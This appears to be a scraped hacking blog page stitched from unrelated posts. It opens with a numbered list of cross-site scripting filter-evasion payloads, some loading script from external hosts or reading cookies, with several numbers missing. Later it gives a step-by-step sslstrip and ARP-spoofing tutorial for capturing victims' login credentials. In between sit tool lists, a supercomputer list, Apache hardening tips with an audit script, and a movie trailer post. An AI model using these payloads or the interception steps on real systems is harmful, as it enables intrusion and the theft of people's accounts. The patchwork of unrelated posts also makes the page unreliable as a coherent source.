One Hundred Cross-site Scripting Payloads

Unknown Reply 1:02 AM

1) <iframe src=" javascript:prompt(1) ">

2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

4) <svg><script >alert&lpar;1&rpar; {Opera}

5) <img/src=`` onerror=this.onerror=confirm(1)

6) <form>
<isindex formaction="javascript&colon;confirm(1)"

7) <img src=``&NewLine; onerror=alert(1)&NewLine;

8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

9) <script 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

11) <script /**/>/**/alert(1)/**/</script /**/

12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>

13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

19) <form>
<a href="javascript:\u0061lert&#x28;1&#x29;">X

20) </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>

21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

22) <form>
<iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

24) http://www.google<script .com>alert(document.location)</script

25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

26) <img/src=@&#32;&#13; onerror = prompt('&#49;')

27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

30) &#00;</form>
<input type&#61;"date" onfocus="alert(1)">

31) <form>
<textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

33) <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>

34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

35) <script ~~~>alert(0%0)</script ~~~>

36) <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

42) <div/style="width:expression(confirm(1))">X</div>
{IE7}

43) <iframe// src=javaSCRIPT&colon;alert(1)

44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

52) <div onmouseover='alert&lpar;1&rpar;'>
DIV</div>

53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

57) <var onmouseover="prompt(1)">On Mouse Over</var>

58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

59) <img src="/" =_=" title="onerror='prompt(1)'">

60) <%<!--'%><script>alert(1);</script -->

61) <script src="data:text/javascript,alert(1)"></script>

62) <iframe/src \/\/onload = prompt(1)

63) <iframe/onreadystatechange=alert(1)

64) <svg/onload=alert(1)

65) <input value=<><iframe/src=javascript:confirm(1)

66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

67) http://www.<script>alert(1)</script .com

68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

69) <svg><script>alert(1)

70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

71) <img src=`xx:xx`onerror=alert(1)>

72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

74) <math><a xlink:href="//jsfiddle.net/t846h/">click

75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

76) <svg contentScriptType=text/vbs><script>MsgBox+1

77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script></svg>

83) <script>+-+-1-+-+alert(1)</script>

84) <body onload="&lt;!--&gt;&amp;#10alert(1)">

85) <script itworksinallbrowsers="">/*<script* */alert(1)</script><script>//&NewLine;confirm(1);</script>

88) <svg><script onlypossibleinopera:-=""> alert(1)

89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

90) <script x> alert(1) </script> style="x:"&gt;

92)  <-- img="" onerror="alert(1)" src="`"> --!&gt;

93)<script src="&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,alert(1)"></script>

94) <div onclick="alert(1)" onmouseover="prompt(1)" style="height: 100%; left: 0; position: absolute; top: 0; width: 100%;">
x</div>
</--></svg></body>

95) "&gt;<img https:="" onerror="window.open(" src="x" www.google.com="" />

96) <br />
<form>
<button formaction="javascript:alert(1)">CLICKME

97) <math><a href="https://www.blogger.com/null" xlink:href="//jsfiddle.net/t846h/">click

98) <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+"></object>

99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

100) <a href="data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203">Click Me</a></a></math></button></form>

Turn Your Chrome Browser Into A Penetration Testing tool





1. Web Developer

The Web Developer extension adds a toolbar button to the browser with various web developer tools. This is the official port of the Web Developer extension for Firefox.

2. d3coder

This extension enables you to encode and decode selected text via the context menu. This reduces the time you spend looking up encoded values and gives you more time to concentrate on the important parts of development.

3. Site Spider

Use this extension to spider a website looking for dead links. One can restrict the spidering to a directory, a domain, or any other regular expression. The spider can also follow one link beyond this restriction, allowing one to find broken external links.

4. Session Manager

Session Manager is a simple yet powerful extension that makes it quick and easy to save, update, remove, and restore sets of tabs.

5. Request Maker

Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages, tamper with the URL, headers and POST data and, of course, make new requests. Request Maker only captures requests sent via HTML forms and XMLHttpRequests; it doesn't fill the log with useless information about images and style sheets.

6. EditThisCookie

EditThisCookie is a cookie manager. You can add, delete, edit, search, protect and block cookies.

7. Cache Killer

This extension allows you to easily disable caching in Chrome. When Cache Killer is activated, it cleans your browser cache before every page load. With just one click you can disable or enable this feature.

8. XSS Rays

XSS Rays is a security tool to help pen test large web sites. Its core features include an XSS scanner, an XSS reverser and object inspection. Need to know how a certain page filters output? Don't have the source? No problem. XSS Rays will black-box reverse an XSS filter without needing the source code.

9. Port Scanner

The Port Scanner extension determines which services are live on a host by probing TCP ports. It checks which TCP ports are listening, and you can scan individual ports to determine whether the device is listening on them. It is recommended that any services which are not necessary be disabled. Port Scanner will analyse a given IP address or URL for open ports to help you secure it.

10. HPP Finder

HPP Finder is a Chrome extension designed for detecting HPP (HTTP Parameter Pollution) attempts. HPP Finder can detect URLs and HTML forms that might be susceptible to parameter pollution, but it is not a complete solution against HPP.

Deep Web list links march 2014 (.onion)

Unknown Reply 4:25 PM


10 Useful Firefox Add-ons For Hackers

Unknown 2 2:53 PM
Mozilla Firefox



1. Greasemonkey

Allows you to customise the way a web page displays or behaves by using small bits of JavaScript.

2. Live HTTP Headers

Check out the HTTP headers of the webpages you're visiting.

3. HackBar

This toolbar will help you in testing SQL injections, XSS holes and site security. It is not a tool for executing standard exploits and it will not teach you how to hack a site. Its main purpose is to help a developer do security audits on his code.

4. Cookies Manager+

View, edit and create new cookies. It also shows extra information about cookies, allows editing multiple cookies at once, and can back them up and restore them.

5. Hide My Ass! Web Proxy

Hide My Ass! operates the most popular browser-based web proxy online; the official extension enables you to easily redirect your web traffic through its anonymous proxy network.

6. User Agent Switcher

The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser.

7. Webpage Screenshot in Firefox

FireShot Webpage Screenshots captures a screenshot of the entire webpage.

8. Firebug

Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.

9. Firesheep

A Firefox extension that demonstrates HTTP session hijacking attacks.

10. Tamper Data

Use Tamper Data to view and modify HTTP/HTTPS headers and POST parameters. Trace and time HTTP requests and responses. Security test web applications by modifying POST parameters.

Source: efytimes.com



8 Most 'Powerful' Supercomputers In The World; Powered by Linux.

Unknown Reply 2:37 PM
Linux

Here's the list :

1. Tianhe-2

Tianhe-2 or TH-2 (literally "Skyriver-2", idiomatically "Milky Way 2") is a 33.86 petaflops supercomputer located in Sun Yat-sen University, Guangzhou, China. It was developed by a team of 1300 scientists and engineers. It is the world's fastest supercomputer according to the TOP500 list for June and November 2013. The development of Tianhe-2 was sponsored by the 863 High Technology Program, initiated by the Chinese government, the government of Guangdong province, and the government of Guangzhou city. It was built by China's National University of Defense Technology (NUDT) in collaboration with the Chinese IT firm Inspur. 

2. K Computer

The K computer is a supercomputer manufactured by Fujitsu, currently installed at the RIKEN Advanced Institute for Computational Science campus in Kobe, Japan. The K computer is based on a distributed memory architecture with over 80,000 computer nodes. It is used for a variety of applications, including climate research, disaster prevention and medical research. The K computer's operating system is based on the Linux kernel, with additional drivers designed to make use of the computer's hardware.

3. IBM Mira

Mira is a petascale Blue Gene/Q supercomputer. It has a performance of 8.16 petaflops and consumes 3.9 MW in power. The supercomputer was constructed by IBM for Argonne National Laboratory's Argonne Leadership Computing Facility with the support of the United States Department of Energy, and partially funded by the National Science Foundation. Mira will be used for scientific research, including studies in the fields of material science, climatology, seismology, and computational chemistry. The supercomputer is being utilised initially for sixteen projects, selected by the Department of Energy.

4. Titan

Titan is a supercomputer built by Cray at Oak Ridge National Laboratory for use in a variety of science projects. Titan is an upgrade of Jaguar, a previous supercomputer at Oak Ridge, that uses graphics processing units (GPUs) in addition to conventional central processing units (CPUs). It is the first such hybrid to perform over 10 petaFLOPS. Titan employs AMD Opteron CPUs in conjunction with Nvidia Tesla GPUs to improve energy efficiency while providing an order of magnitude increase in computational power over Jaguar. It uses 18,688 CPUs paired with an equal number of GPUs to perform at a theoretical peak of 27 petaFLOPS.

5. IBM Sequoia

IBM Sequoia is a petascale Blue Gene/Q supercomputer constructed by IBM for the National Nuclear Security Administration as part of the Advanced Simulation and Computing Program (ASC). Record-breaking science applications have been run on Sequoia, the first to cross 10 petaflops of sustained performance. The entire supercomputer runs on Linux, with CNK running on over 98,000 nodes, and Red Hat Enterprise Linux running on 768 I/O nodes that are connected to the filesystem.

6. Stampede

Stampede is one of the most powerful machines in the world for open science research. Funded by the National Science Foundation Grant ACI-1134872 and built in partnership with Intel, Dell and Mellanox, Stampede went into production on 7 January, 2013. Stampede comprises 6400 nodes, 102400 CPU cores, 205 TB total memory, 14 PB total and 1.6 PB local storage. The bulk of the cluster consists of 160 racks of primary compute nodes, each with dual Xeon E5-2680 8-core processors, a Xeon Phi coprocessor, and 32 GB RAM. The cluster also contains 16 nodes with 32 cores and 1 TB RAM each, 128 "standard" compute nodes with Nvidia Kepler K20 GPUs, and other nodes for I/O (to a Lustre filesystem), login, and cluster management. Stampede can complete 9.6 quadrillion floating point operations per second.

7. SuperMUC

SuperMUC will be the successor of the Höchstleistungsrechner Bayern II (HLRB II). The SuperMUC will have 18,432 Intel Xeon Sandy Bridge-EP processors running in IBM System x iDataPlex servers with a total of 147,456 cores and a peak performance of about 3 petaFLOPS. The main memory will be 288 terabytes together with 12 petabytes of hard disk space based on the IBM General Parallel File System (GPFS). It will also use a new form of cooling that IBM developed, called Aquasar, that uses hot water to cool the processors, a design that should cut cooling electricity usage by 40 percent, IBM claims.

8. JUQUEEN

JUQUEEN at the Forschungszentrum Jülich is a 28-rack Blue Gene/Q system. It will have a peak performance of about 5,872 Tflops. JUQUEEN runs Red Hat Enterprise Linux.

Credits to 4ntipatika

8 Simple Tips to Secure your Apache Web Server

apache http server

Apache is the most widely used Web server on the Internet. It was developed to work in a Unix environment, but has been ported to other server operating systems such as Windows. The Apache web server serves millions of websites and web applications. A wide range of authentication schemes, support for many language interfaces, and its security features make it the favorite Web server of millions of users all over the globe.
That popularity also makes websites backed by Apache a favorite target among hackers. Such websites often fall prey to attacks not because of security risks and holes in Apache, but mainly because of poorly written code and other security issues associated with the database. The Apache and Linux combination provides good security, but things might go wrong if you don’t take the right measures. There are several things one needs to do to secure Apache. We have compiled a list of simple things you should do to make your Web server secure.


1. Update
Security holes and potential risks are found and fixed in every Apache release. The developer community is constantly working on new security issues, and we can’t stress enough how important it is to update. A good update policy and a good security policy work hand in hand. You should not only update Apache when there is a major release, but also install all the patches. It is also wise to update PHP (if you use it) when you update Apache. You can check the current version of Apache by using the following command.
# httpd -v
Server version: Apache/2.*.** (Unix)
Server built: Mar 12 2014 13:20:23
If it shows that the version of Apache you are running is not up to date, do update.


2. Apache version and OS
If an error occurs, the server might return information about the error along with the Apache version and details about the OS. A simple 404 page can give away crucial information about the Web server and OS. In some cases, it might even return details about the Apache modules that are installed on the server. To turn this off, open the config file (httpd.conf) with a text editor and find the string “ServerSignature On.” It should be On by default. Turn it off simply by replacing “On” with “Off”. Now the HTTP site header and error pages will only show that it runs Apache and will not show the version.


3. Disable Directory Listing
If there is no index file in the root directory, Apache will, by default, list all the files in the root directory. There are several ways to prevent Apache from listing the files in the root folder. Again, you need to add a couple of lines to the config file. There are two ways of doing this: set the Options directive to either “-Indexes” or “None.” If you don’t have a clue what we are talking about, just add the following lines to the config file.
<Directory /var/www/html>
    Options -Indexes
    Order allow,deny
    Allow from all
</Directory>
Or use the following code.
# The directory path was lost in the original listing; /var/www/html from the block above is assumed.
<Directory /var/www/html>
    Options None
    Order allow,deny
    Allow from all
</Directory>
In some distributions these directives are already set, but it’s better to check; after all, better safe than sorry.


4. Secure the config file
If you are a newbie and have been following the steps above, you will have realised that the httpd.conf file is quite important in keeping your server secure. So it is better to protect the file against changes. You can always remove the protection when you want to edit it. Use the following command to make the config file immutable.
chattr +i /etc/httpd/conf/httpd.conf
From chattr man page:
“A file with the `i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.”

5. Prevent DoS attack by limiting request size
Most denial-of-service attacks could be prevented by not allowing large requests. By default, LimitRequestBody is unlimited. Depending on your website’s requirements, the limit can be changed. You could also limit requests to more vulnerable directories such as upload folders.


6. Disable unwanted Modules
By disabling several modules that are not of any use to you, you can reduce the security vulnerability of your server. To find out the list of all the modules in your Web server, you can use the following command.
# grep LoadModule /etc/httpd/conf/httpd.conf
Analyse all the modules in the output list and figure out the ones that are unnecessary. You don’t even have to delete the lines. Just add “#” at the beginning of a line and that module will be deactivated after you restart the service.


7. Do not run Apache as root
Apache should not run as root. It is always good to run Apache as a separate user. It will run as daemon or nobody by default. Set up a non-privileged account dedicated to Apache. Never set the Apache User or Group to root.
# vi httpd.conf
Group apache
User apache


8. Choose the Right Hosting Provider
This doesn’t have anything to do with fiddling with your Web server. Some of the most popular web hosting services are from America or Europe. Popular doesn’t mean highly secure. You don’t necessarily have to buy your web hosting from these hosting providers. If you don’t live in the U.S., you can find a lot of reliable, affordable, and secure hosting providers in your own country. Do you live in Australia? Look for an Australian website hosting provider like EZI Hosting and choose the most popular hosting providers whose IP addresses are not often attacked by hackers.
KEEP SAFE ;)
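
The checks from tips 2, 3, 5, 6 and 7 as a script, added here as an illustration and not part of the original article: it reads an httpd.conf-style file and reports each setting. The function names, both sample configs and the ServerTokens check are assumptions of this example; ServerTokens is the directive that controls the Server response header, which ServerSignature alone does not change.

```sh
#!/bin/sh
# Added example, not from the original article. Scope blocks (<Directory>,
# <VirtualHost>) are not evaluated: each directive is judged wherever it appears.

audit_httpd_conf() {
    # $1: path to an httpd.conf-style file. Prints one finding per line.
    # Exit status is 1 when at least one FAIL finding was printed, otherwise 0.
    awk '
        function report(level, msg) {
            print level " " msg
            if (level == "FAIL") fails++
        }
        /^[ \t]*#/ || /^[ \t]*$/ { next }        # skip comments and blank lines
        { d = tolower($1) }                      # directive names are case-insensitive
        d == "serversignature"  { sig = tolower($2) }
        d == "servertokens"     { tok = tolower($2) }
        d == "limitrequestbody" { lrb = $2 }
        d == "user"             { user = $2 }
        d == "group"            { group = $2 }
        d == "loadmodule"       { mods++ }
        d == "options" {
            # Indexes, +Indexes and All each switch directory listing on
            for (i = 2; i <= NF; i++) {
                o = tolower($i)
                if (o == "indexes" || o == "+indexes" || o == "all")
                    idx = idx (idx == "" ? "" : ",") NR
            }
        }
        END {
            if (sig == "off")   report("OK", "ServerSignature off")
            else if (sig == "") report("WARN", "ServerSignature not set in this file")
            else                report("FAIL", "ServerSignature " sig ": server-generated pages carry a server footer")

            if (tok == "prod" || tok == "productonly") report("OK", "ServerTokens " tok)
            else report("WARN", "ServerTokens " (tok == "" ? "unset" : tok) ": the Server header may include version and OS")

            if (idx != "") report("FAIL", "Options enables Indexes at line(s) " idx)
            else           report("OK", "no Options line enables Indexes")

            if (lrb + 0 > 0) report("OK", "LimitRequestBody " lrb)
            else             report("WARN", "LimitRequestBody unset or 0: request bodies are unlimited")

            if (user == "root" || group == "root")
                report("FAIL", "User/Group is root (User=" user ", Group=" group ")")
            else if (user == "") report("WARN", "User not set in this file")
            else                 report("OK", "runs as " user ":" group)

            report("INFO", (mods + 0) " LoadModule lines to review")
            exit (fails > 0)
        }
    ' "$1"
}

write_sample_conf() {
    # $1: output path, $2: "weak" or "hardened". Both configs are constructed samples.
    if [ "$2" = "hardened" ]; then
        cat > "$1" <<'EOF'
ServerSignature Off
ServerTokens Prod
User apache
Group apache
LoadModule dir_module modules/mod_dir.so
<Directory /var/www/html>
    Options -Indexes
    LimitRequestBody 1048576
</Directory>
EOF
    else
        cat > "$1" <<'EOF'
# constructed sample, not a real server config
ServerSignature On
User root
Group apache
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
#LoadModule dav_module modules/mod_dav.so
<Directory /var/www/html>
    Options Indexes FollowSymLinks
    Order allow,deny
    Allow from all
</Directory>
EOF
    fi
}

# Audit the weak sample and then the hardened one.
for kind in weak hardened; do
    conf=$(mktemp)
    write_sample_conf "$conf" "$kind"
    echo "== $kind sample =="
    audit_httpd_conf "$conf" || echo "-> FAIL findings present"
    rm -f "$conf"
done
```

On a real server, point audit_httpd_conf at the file used in tip 6 (/etc/httpd/conf/httpd.conf) and at any files it includes.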

sslstrip and arpspoofing with Kali linux Tutorial

Kali Linux


Intention/Intro

Educational purposes only.
This tutorial will teach how to ARP spoof a network and get user information even from websites that use encryption (HTTPS). In this tutorial we’ll use Kali Linux (Live CD) and the sslstrip software, modify the etter.conf file, add new rules to iptables and use the ettercap software.

Pre-configurations

The commands below will set iptables to redirect everything that comes from port 80 to port 10000. Our goal here is to set sslstrip to strip HTTPS from pages and give the end user an HTTP page (with no security, no encryption). So, the port that we’ll use to redirect the stripped content will be port 10000.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Usage

It’s time to run sslstrip and do the tricks that I mentioned before. To run it, use the command below:
$ sslstrip -l 10000
Now, open another terminal window and run the command below:
$ ettercap -G
A window will pop up; that’s the ettercap GUI. Click on Sniff > Unified sniff and choose the interface that has an internet connection (the same network as your victims). For example, I chose wlan0, but if I were using a cable, I would have chosen the eth0 interface. Now click on Host > Scan for hosts. Now click again on Host > Host List. Select your gateway (the IP through which you can access your router; it’s usually an IP that ends with 1 [like 192.168.2.1], but keep in mind that’s not a rule!) and click on the button Target 1. Select the IP that your target is using and click on the button Target 2 (you can select multiple IPs if you click on them while holding the Ctrl or Command key). Now, click on Plugins > Manage Plugins and a list of plugins will appear. Double click on dns_spoof and make sure that there’s an asterisk ( * ) by it after you double click it. Now, click on Mitm > Arp spoofing, select the first option that you see in the window that pops up and click on OK. Now click on Start > Start sniffing. You’re all set! Wait until your target accesses pages like gmail, facebook, twitter or anything else that requires credentials. When your target accesses those sites, ettercap will show the user and password that your target used.
Remember: sslstrip is responsible for making the HTTPS website unsecured! What I’m saying is that the target’s browser will request the page and the server will return an HTTPS page. sslstrip intercepts it on port 10000 and returns an HTTP page (no encryption) to the user. Beautiful, isn’t it?

Conclusion

This attack is simple to do and very effective. I strongly recommend that you use the Live Kali (instead of installing on your machine or on a VM). I have Kali installed on a computer and it often gives me a headache to fix my mistakes. Ettercap might not work if you’re using a VM. In order for it to work, you should download/install all the extra VM tools that are available. Ettercap might not work on an installed Kali. I couldn’t find a reason for that problem yet, but I read that if you uninstall it and install it from the GitHub source, it might work better than the one that came with Kali. Warning: To install ettercap from GitHub, you might face missing libs. It uses a lot of different libs and it will take some time for you to get them all installed on your machine. If you want to try to install it, use the commands below:
$ sudo apt-get remove ettercap-common ettercap-graphic
$ git clone https://github.com/Ettercap/ettercap
$ cd ettercap && mkdir build && cd build && cmake ../ && make install
Ettercap sometimes didn’t work when I pressed the Start Sniffing option. What did I do to make it work? I went back to the first step of this tutorial and repeated everything.
How can you protect yourself from attacks like this? You could use software like XArp, create static ARP tables, or you could read this.

Source:http://l33ttutorials.wordpress.com

Diary ng Pangit the movie (Watch Online and free Download)

Unknown Reply 8:56 PM
Diary ng Pangit the Movie

The number 1 best-selling book of 2013, soon to be a blockbuster movie this APRIL 2, 2014! This is the OFFICIAL FULL TRAILER of Diary ng Panget The Movie! :)

Starring:
Nadine Lustre as Eya Rodriguez
James Reid as Cross Sandford
Yassi Pressman as Lory Keet
Andre Paras as Chad Jimenez

Directed by Andoy Ranay

Story by Denny aka HaveYouSeenThisGirl


Credits to benjr17






what is the top 100 Hacking Tools? (must-have)

Unknown 3 2:42 PM
leet shares


Wireless Hacking: These are tools that help you hack into wireless networks. Wireless hacking tools, though useful, do not make you a complete hacker. In order to achieve that, you must learn the different ways in which a secure network can be accessed. Also, you should work on making your own network as secure as possible.

1. Aircrack-ng

2. Kismet 

3. inSSIDer

4. KisMAC 

Intrusion Detection Systems: Intrusion detection tools are one of the most important parts of any security arrangement. They allow you to detect those threats that are potentially dangerous for your system.

1. Snort 

2. NetCop 

Port Scanners

1. Nmap 

2. Superscan 

3. Angry IP Scanner 

Encryption Tools: In an age where more and more governments are being found spying on their own citizens, encryption is the word of the day. These tools allow you to encrypt your data so that even if someone does get through, they can’t get to the data easily.

1. TrueCrypt 

2. OpenSSH 

3. Putty 

4. OpenSSL 

5. Tor 

6. OpenVPN 

7. Stunnel 

8. KeePass 

Password Crackers: The name is pretty self explanatory in this case. These tools help you recover passwords from the data that a computer system is storing or transmitting over a network.

1. Ophcrack 

2. Medusa 

3. RainbowCrack 

4. Wfuzz 

5. Brutus 

6. L0phtCrack 

7. fgdump 

8. THC Hydra 

9. John The Ripper 

10. Aircrack - Aircrack is an 802.11 WEP and WPA-PSK key cracking program.

11. Cain and Abel 

Packet Crafting: Packet crafting is the technique through which an attacker finds vulnerabilities or entry points within your firewall. These tools help you achieve that more easily.

1. Hping 

2. Scapy 

3. Netcat 

4. Yersinia 

5. Nemesis 

6. Socat 

Traffic Monitoring: These are tools that let you monitor what websites your employees or children are visiting.

1. Splunk 

2. Nagios 

3. P0f 

4. Ngrep 

Packet Sniffers: These are tools that can allow you to capture and visualise the traffic that is coming on your website.

1. Wireshark 

2. Tcpdump 

3. Ettercap 

4. dsniff 

5. EtherApe 

Vulnerability Exploitation: These are the tools that you would use in order to gain access to various places.

1. Metasploit 

2. sqlmap 

3. sqlninja 

4. Social Engineer Toolkit 

5. NetSparker 

6. BeEF 

7. Dradis


Vulnerability Scanners: These are programs that have been designed to assess a computer or network’s vulnerability to attacks. The functionality of these tools varies from one to the other, but they all present a detailed analysis of how vulnerable your system is.

1. Nessus

2. OpenVAS

3. Nipper

4. Secunia PSI

5. Retina

6. QualysGuard

7. Nexpose

Web Vulnerability Scanners: While vulnerability scanners are meant for your system, web vulnerability scanners assess the vulnerability of web applications. They identify the security vulnerabilities that your app may have through various tests.

1. Burp Suite

2. WebScarab

3. Websecurify

4. Nikto

5. w3af

Web Proxies: Proxies were originally created in order to add encapsulation to distributed systems. The client contacts a proxy server in order to request an item that exists on your server.

1. Paros

2. Fiddler

3. Ratproxy

4. sslstrip

Rootkit Detectors: This tool is a file and directory integrity checker. It verifies if a file is trustworthy and informs the user if found otherwise.

1. AIDE (Advanced Intrusion Detection Environment)

Firewalls: You obviously know what a Firewall is. These monitor and control the traffic in your network, whether incoming or outgoing. They are essential security tools that are used by the most novice to the most advanced users.

1. Netfilter

2. PF: OpenBSD Packet Filter

Fuzzers: The concept of fuzzing is usually put to use in order to test the security vulnerabilities of computer systems or in the software that runs on them.

1. skipfish

2. Wfuzz

3. Wapiti

4. W3af

Forensics: This refers to tools that are used for computer forensics. They are used to find evidence that exists in computer systems.

1. Sleuth Kit

2. Helix

3. Maltego

4. Encase

Debuggers: These are tools that are used in order to write exploits, reverse engineer binary files and to analyse malware.

1. GDB

2. Immunity Debugger

